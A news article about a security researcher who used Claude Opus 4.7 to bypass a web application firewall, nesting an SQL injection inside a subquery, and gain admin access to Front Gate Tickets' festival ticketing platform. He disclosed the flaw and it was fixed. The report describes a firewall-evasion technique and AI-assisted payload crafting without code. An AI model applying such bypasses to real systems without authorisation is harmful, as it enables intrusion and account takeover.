Hacker exploits Claude AI to score lifetime VIP music festival tickets
During the summer, music festivals grow and multiply, although some are so coveted that getting tickets is an impossible task. But what if you could create additional tickets for yourself for free? This is what a security researcher named Ian Carroll has demonstrated.
The ethical hacker recounts how he infiltrated the system of the ticket sales platform Front Gate Tickets, owned by Live Nation, and realized he could issue tickets in bulk. This portal provides services to the most important festivals in the U.S., such as Lollapalooza, Bonnaroo, Austin City Limits, Electric Daisy Carnival, and South by Southwest.
"It was great to see a $4,000 ticket and be able to press a button and issue as many as I wanted," he told Wired.
"I could attend all the events without limitations or restrictions; I could get backstage passes or anything they sell to the super VIPs, even if the tickets are sold out," he added.
But how did Carroll achieve such a feat? To accomplish this, he had an invaluable ally: Claude from Anthropic. The well-known AI allowed him to identify a vulnerability generated from an unauthenticated SQL injection flaw in Front Gate's device API.
This type of web vulnerability allows attackers to manipulate database queries when applications do not properly validate user input.
Initially, the researcher could not penetrate the page. The site's web application firewall blocked his hacking attempts. That's when he thought of 'using a lifeline' and turning to the latest AI model from Anthropic, Claude Opus 4.7.
Thanks to this tool, the hacker was able to discover that the firewall only inspected the outer layer of the sent SQL queries. By encapsulating the malicious query within a nested subquery, the AI generated a payload that bypassed the protection.
After bypassing the firewall, Carroll was able to access a database with more than 500 tables. Among the exposed information were employee login data and real-time password reset tokens. Through these tokens, he gained administrator privileges on the platform, and from there, everything was a piece of cake.
This administrative access gave him the opportunity to create tickets for any event organized through Front Gate, such as the aforementioned premium packages.
Obviously, the researcher only wanted to report the flaw and not profit from it. Thus, he states that he never generated or redeemed any tickets.
"I stopped here and did not review any logs beyond what was necessary to confirm the issue. The point was clear: an unauthenticated request to a scanning API was enough to become an administrator of EDC, Bonnaroo, and any other festival on the platform," he clarified.
The expert warned of the risk and additional ones, such as threat actors being able to redeem active password reset tokens to hijack employee and customer accounts.
As a show of good faith, the ethical hacker communicated his findings to Front Gate on April 25, with the company resolving the issue a day later.
Related Stories
AI News
From country music to a unifying World Cup run: Mauricio Pochettino's American journey
26 minutes ago
AI News
Tristan England Wins BKT Freestyle World Championship at World Finals
26 minutes ago
AI News
Despite stormy weather, America marks 250 years of independence, in photos
26 minutes ago
AI News
Severe weather disrupts some America 250th celebrations; Trump says he will still speak in DC
26 minutes ago
AI News
FBI seized more than 600 drones near World Cup events
26 minutes ago
AI News
9 injured in boat explosion at restaurant
28 minutes ago
AI News
Ambassador Hoekstra wants American booze back on Canadian shelves next year
28 minutes ago
AI News
Here’s where Utahns can watch professional fireworks — and drone shows
30 minutes ago